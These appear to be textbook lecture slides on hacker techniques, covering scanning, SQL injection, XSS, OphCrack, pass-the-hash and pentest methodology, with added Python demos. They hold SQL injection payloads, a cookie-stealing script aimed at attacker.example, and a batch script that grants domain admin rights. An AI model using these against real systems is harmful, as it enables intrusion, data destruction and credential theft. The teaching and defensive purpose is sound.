
Computer Security Fundamentals
by Chuck Easttom

Chapter 6 Techniques Used by Hackers


Chapter 6 Objectives

 Understand the basic methodology used by hackers
 Be familiar with some of the basic tools
 Understand the hacking mentality

© 2016 Pearson, Inc. Chapter 6 Techniques Used by Hackers 2


Introduction
 Basic Terminology
 White hat hacker (hacks for legal / ethical purposes), black hat hacker or cracker (uses illegal techniques), gray hat hacker (a former criminal now turned ethical)
 Script kiddies (download tools without necessarily understanding them and use them to perform criminal attacks)
 Phreaking (hacking into phone systems)


The Reconnaissance Phase
 Passive Scanning (does not require the attacker to connect to the target system, so the target sees no traffic from the attacker)
 Just by checking the target organization's websites (material for social engineering and spear phishing, technical staff posting on bulletin boards, ads, etc.)
 Specific websites providing information an attacker may find useful


Netcraft.com Provides web server and web
hosting market-share analysis
including web server and OS
detection



Archive.org Non-profit library of millions of free books, software, websites, etc. (its Wayback Machine shows earlier versions of a target's website, including pages that have since been removed)


The Reconnaissance Phase (cont.)
 Active Scanning Techniques
 More reliable than passive scanning techniques, because the attacker sends packets to the target and observes how it responds
 May be detected by the target system using an intrusion detection system (IDS)


1) Port Scanning
 Nmap (Network Mapper)
 Free tool, probably the most popular: https://nmap.org/
 Used to discover hosts and services on a computer network by sending packets and analyzing responses
 Written in C, C++, Python, Lua
 Cross-platform (started as a Linux utility); a GUI front end, Zenmap, is also available

Scan Types
 Ping
 Connect
 Syn
 Fin


Ping Scan
 The ping scan sends an ICMP echo request to the target host to find out whether it is up; it does not probe ports (many network administrators block incoming ICMP packets, so Nmap's host discovery also falls back to TCP probes)
 An active device returns an ICMP echo reply; no reply means the host is down, the IP address is not in use, or ICMP is being filtered


Connect Scan
 Fully connects to the target IP address and port, using the operating system's normal connect() call
 Does a complete TCP handshake
 This is the most reliable, and needs no special privileges, but it will absolutely be detected: the listening application sees a finished connection and can log it


Syn Scan
 This scan is stealthier than a connect scan
 Sends SYN (synchronize) requests to the target to gather information about open ports without completing the TCP handshake process
 When an open port answers with SYN/ACK, the scanner replies with RST instead of the final ACK, so the handshake is torn down before it completes and the application never sees a connection. This technique is sometimes called a half-open scan
 A closed port answers the SYN with RST; no answer at all usually means a firewall is filtering the port
 Needs raw-socket (root/administrator) privileges, and most current IDSs and firewalls detect it easily
Fin Scan
 Sends a FIN (finish) packet to the target without any preceding handshake.
 If that port is closed (not listening), the target answers with RST.
 If it is listening, the packet is ignored and no response comes back.
 This relies on RFC 793 behaviour; Windows and some other stacks send RST for both open and closed ports, so the scan cannot tell them apart there.


NMAP Flags (Customizing the scan)
 -O detects operating system (needs root/administrator privileges, because it sends raw packets)
 -sn is a ping scan (host discovery only, no port scan); -sP is the older name and is still accepted
 -sT TCP connect scan (the default when Nmap runs without raw-socket privileges)
 -sS SYN scan (the default when it runs with them)
 -sF FIN scan

Examples
The most basic scan: nmap 192.168.1.1
Scan a range of IP addresses: nmap 192.168.1.1-20
Scan to detect the OS: nmap -O 192.168.1.1
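As an added example (not from the book or from Nmap), here is the connect scan described above written with plain sockets, the same technique as nmap -sT. Every probe goes through the OS's connect() call and completes the three-way handshake, which is why the scan needs no privileges and is reliable, and why the target application sees and can log each probe. The target is a listener the script starts itself on 127.0.0.1, so the demo runs offline; the port numbers are chosen by the OS at run time.

```python
"""TCP connect scan with plain sockets (added example, not from the book).
The listener it scans is started locally, so everything stays on loopback."""
import socket
import threading
from typing import Dict, List

OPEN, CLOSED, FILTERED = "open", "closed", "filtered"


def probe_port(host: str, port: int, timeout: float = 1.0) -> str:
    """Classify one port the way a connect scan does.

    connect() returning means SYN -> SYN/ACK -> ACK completed: open.
    A RST in reply to our SYN surfaces as ConnectionRefusedError: closed.
    No reply before the timeout is the signature of a firewall dropping
    the SYN: filtered (Nmap reports the same three states for -sT).
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return OPEN              # handshake done; the service now has a log entry
        except ConnectionRefusedError:
            return CLOSED
        except OSError:              # includes socket.timeout / TimeoutError
            return FILTERED


def connect_scan(host: str, ports: List[int]) -> Dict[int, str]:
    """Probe each port in turn; returns {port: state}."""
    return {port: probe_port(host, port) for port in ports}


def start_listener() -> socket.socket:
    """Constructed target: a TCP service on an OS-chosen loopback port.
    It accepts and logs each connection, exactly what makes -sT noisy."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop() -> None:
        while True:
            try:
                conn, peer = srv.accept()
            except OSError:
                return               # listener closed, demo over
            print(f"[target log] connection from {peer[0]}:{peer[1]}")
            conn.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv


def free_port() -> int:
    """An OS-chosen loopback port that nothing listens on (bound, then released)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as tmp:
        tmp.bind(("127.0.0.1", 0))
        return tmp.getsockname()[1]


def demo() -> Dict[str, str]:
    """Scan one listening and one closed loopback port; returns their states."""
    srv = start_listener()
    listening = srv.getsockname()[1]
    closed = free_port()
    try:
        states = connect_scan("127.0.0.1", [listening, closed])
    finally:
        srv.close()
    return {"listening_port": states[listening], "closed_port": states[closed]}


if __name__ == "__main__":
    for name, state in demo().items():
        print(f"{name}: {state}")
```

The "[target log]" line printed by the listener is the point of the connect scan's weakness: a SYN scan would never produce it, because the RST it sends in place of the final ACK stops the kernel from handing the connection to the application.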


2) Enumeration
 The process of finding out what is on the target system
 If an entire network: servers, workstations, printers, etc.
 If a specific computer: users, shared folders, etc.
 Example enumeration tools
 Sid2User
 Cheops (Linux only)
 UserInfo
 UserDump
 DumpSec
 Netcat
 NBTDump

Cain and Abel (one of the easiest to use)
Simply click on the Network tab and Cain and Abel will find all the machines connected to the network you are on
To Defend Against Scanning
 You should use the following techniques:
 Be careful how much information you put on the Internet about your organization and its network.
 Make it a company policy that technical personnel who use bulletin boards, chat rooms, and so on, for technical data must not use their real name or reveal the company's name.
 Use an IDS that detects many scans.
 Block incoming Internet Control Message Protocol (ICMP) packets (this stops plain ping sweeps; Nmap can still find hosts with TCP probes, so it raises the attacker's cost rather than ending discovery).
 These won't make scanning and reconnaissance impossible on your system, but they will make certain the attacker gathers significantly less information.


Actual Attacks
 Now that we have discussed how attackers scan a target system (reconnaissance phase)
 Consider a few attacks that are commonly used


1) SQL Injection
 One of the most common web attacks
 It is a code injection technique that can read, alter or destroy your database
 It is the placement of malicious code in SQL statements, via web page input
 Depends on knowledge of SQL
 Basics are easy
 SQL injection usually occurs when you ask a user for input, like their username/password, and instead of a name/password the user gives you an SQL fragment that your code concatenates into a query and unknowingly runs on your database


What is SQL?
 A relational database contains one or more tables, each identified by a name
 Tables are relations
 Rows are records (tuples)
 Columns are attributes
 SQL (Structured Query Language) uses commands such as SELECT, UPDATE, DELETE, INSERT, WHERE, and others


More on SQL
 Web sites are written in some programming language such as PHP, ASP, JSP, ASP.NET
 Those programming languages have their own syntax (not SQL)
 If you just place SQL statements directly in the web page code, an error will be generated
 So programmers put the SQL statements into the programming code for the web site in strings, and the trouble starts when user input is glued into those strings


More on SQL (Cont.)

Example: Consider the script that builds an SQL query by combining predefined strings with text entered by a user:

string sSQLstatement;
sSQLstatement = "SELECT * FROM tblUsers WHERE UserName = '"
    + txtUsername.Text + "' AND Password = '" + txtPassword.Text + "'";

If you enter username = admin and the password = password, this code will produce this SQL command:
SELECT * FROM tblUsers WHERE UserName = 'admin' AND Password = 'password'

However, whatever you type into the text field gets put into the query unchanged.


What Does This Cause?
 "SELECT * FROM tblUsers WHERE UserName = '" + txtUsername.Text + "' AND Password = '" + txtPassword.Text + "'"

Try entering ' or '1' = '1 as both the username and the password:

SELECT * FROM tblUsers WHERE UserName = '' or '1' = '1' AND Password = '' or '1' = '1'

Because '1' = '1' is always true, the WHERE clause matches every row and the login succeeds without a valid password (AND binds tighter than OR, so the statement reads as UserName = '' OR ('1' = '1' AND Password = '') OR '1' = '1', and the last term alone is true for every row).


Other Examples SQL Injection

"SELECT * FROM customers WHERE email = '$my_email'"

If the user maliciously inserts the simple fragment x' OR 'x' = 'x into the form field for my_email, we will get:

SELECT * FROM customers WHERE email = 'x' OR 'x' = 'x'

which returns every customer record.
Other Examples SQL Injection (cont.)
"SELECT * FROM OrdersTable WHERE ShipCity = '" + ShipCity + "'"

If the user enters XYZ, then the following SQL is generated:

SELECT * FROM OrdersTable WHERE ShipCity = 'XYZ'

What happens if the user maliciously inserts XYZ'; DROP TABLE OrdersTable --

SELECT * FROM OrdersTable WHERE ShipCity = 'XYZ'; DROP TABLE OrdersTable --'

The quote closes the string, the semicolon starts a second (stacked) statement that drops the table, and the -- comments out the closing quote the code appends. This stacked form only works where the database driver executes several statements in one call (SQL Server batches do; many other drivers run a single statement per call); the auth-bypass forms above need no such support.
2) Cross Site Scripting

An attacker injects client-side script into web pages viewed by other users. The term cross-site scripting originally referred to the act of loading the attacked, third-party web application from an unrelated attack site, in a manner that executes a fragment of JavaScript prepared by the attacker in the security context of the targeted domain.
Essentially you enter scripts into an area that other users interact with (a comment field, a profile page, a forum post), so that when they go to that part of the site your script runs in their browser, rather than the intended web site functionality. This can include redirecting them, or sending their session cookie to the attacker.
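As an added example (not from the book), a comment box rendered the way the slide describes and then rendered with output encoding. The vulnerable version puts stored comment text straight into the page, so a script another user submitted runs in every viewer's browser; html.escape fixes that for text content, but an attacker-supplied link needs a scheme check as well, because escaping leaves a javascript: URL intact. The comments and the attacker host name are constructed for the demo.

```python
"""Stored XSS: vulnerable rendering beside context-aware encoding
(added example, not from the book)."""
import html
from typing import List
from urllib.parse import urlparse

# Constructed "stored" comments, as they would sit in the site's database.
STORED_COMMENTS = [
    "Great article!",
    "<script>document.location='http://attacker.example/?c='+document.cookie</script>",
]


def render_vulnerable(comments: List[str]) -> str:
    """Stored XSS: attacker text becomes markup in everyone else's page."""
    return "".join(f"<p class='comment'>{c}</p>" for c in comments)


def render_escaped(comments: List[str]) -> str:
    """html.escape turns < > & ' and \" into entities, so the browser shows
    the script as text instead of executing it."""
    return "".join(f"<p class='comment'>{html.escape(c, quote=True)}</p>"
                   for c in comments)


def safe_href(url: str) -> str:
    """Attribute context: a user-supplied link needs a scheme allowlist on top
    of escaping. html.escape('javascript:alert(1)') is unchanged and still
    runs on click, so anything but http/https is replaced with '#'."""
    scheme = urlparse(url.strip()).scheme.lower()
    if scheme not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)


def render_link(url: str, label: str) -> str:
    """An <a> whose href and text both come from the user."""
    return f'<a href="{safe_href(url)}">{html.escape(label, quote=True)}</a>'


if __name__ == "__main__":
    print("vulnerable:", render_vulnerable(STORED_COMMENTS))
    print("escaped   :", render_escaped(STORED_COMMENTS))
    print("link      :", render_link("javascript:alert(1)", "click me"))
```

The two render functions differ by one call, which is the whole defence for text content; the href case shows why encoding alone is not a complete answer and why the rule is to encode for the context the data lands in.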


Password Cracking
 A very popular tool for cracking Windows passwords is OphCrack
 OphCrack can be downloaded from http://ophcrack.sourceforge.net
 It is based on an understanding of how Windows passwords work
 Windows passwords are stored as hashes in the SAM file, usually under C:\WINDOWS\system32\config\ (SAM is an acronym for Security Accounts Manager)
 The passwords are stored as a hash (Hashes will be discussed in detail in Chapter 8, "Encryption")
Password Cracking (Cont.)
 What Windows does is hash the password you type in and compare it to the hash found in the SAM file
 If there is a match, then you are logged in
 To prevent someone from copying the SAM file and taking it off to try to brute force it, as soon as Windows begins the boot process, the OS locks the SAM file
 What OphCrack does is boot to Linux from its live CD, so Windows is not running and the SAM file can be read straight off the disk


OphCrack- How It Works
 Download the OphCrack live CD image and burn it to a CD (or write it to a USB stick).
 Put the CD in the target computer and boot from it.
 It boots as Linux, grabs the Windows password file, cracks the hashes against precomputed rainbow tables (the time-memory trade-off invented by OphCrack's author, Philippe Oechslin), and produces a text file with usernames and passwords.
 You cannot even consider yourself a hacker without this tool in your toolkit.
 This works because Windows password hashes are unsalted, so a table computed once applies to every machine; it also needs physical access and a machine that will boot from removable media, which is why full-disk encryption and a locked boot order defeat it.


Malware Creation
 GUI tools
 Batch Files
 Writing your own



Malware Creation
 In Chapter 5, “Malware,” you saw the tool eLiTeWrap
 In this section you will see the tools used to actually
create viruses
 These tools allow the end user to click a few buttons and
create a virus
 There are websites that contain catalogs of malware
code
 Anyone with only moderate programming skills can download the
code for a virus and modify that malware for his specific needs
 You can think of this as a sort of cyber weapons proliferation
 There are even ransomware development kits



TeraBIT Virus Maker (can create some
rather damaging malware)



Other Attacks (Windows Hacking Techniques)
 Pass the hash
 If the attacker can obtain a valid username and that user's password hash, he can authenticate with the hash itself, without ever knowing the actual password. NTLM authentication proves possession of the hash rather than the password, so the hash is a password equivalent (pass the hash skips the step that hashes the typed password and feeds the stolen hash straight into the authentication exchange)


Other Attacks (Windows Hacking Techniques)
 Scripts (This particular exploit first requires access to the target machine with at least guest-level privileges; in practice it also needs write access to the All Users startup folder, which the default ACLs reserve for administrators)

The attacker writes the following two-line batch script (net user adds or deletes a user or sets a user's password from the Windows command line; net group changes domain group membership):

net user localaccountname password /add /domain
net group "Domain Admins" localaccountname /add /domain

Then he saves that script in the All Users startup folder.

The next time someone with domain admin privileges logs on to the machine, the script runs with that user's rights, and localaccountname is now a domain admin. Both commands succeed only because they run as the domain admin; run from the attacker's own low-privilege account they would be refused.


Penetration Testing (methodical probing of a target network in order to identify weaknesses in the network)

 NIST 800-115
 NIST SP 800-115 is the National Institute of Standards and Technology guideline for security assessments of Federal Information Systems. Assessments include penetration tests.
 Four phases:
 Planning: Set specific testing goals, related to previous risk assessment evaluations on the target network
 Discovery: Use a variety of tools (the scanning and enumeration techniques above) to find hosts, services and vulnerabilities
 Attack: apply the hacking techniques discussed in this chapter
 Reporting: Detailed report to the person who hired the penetration tester


Penetration Testing (Contd.)
 National Security Agency Information Assessment Methodology
 PCI Penetration Testing Standard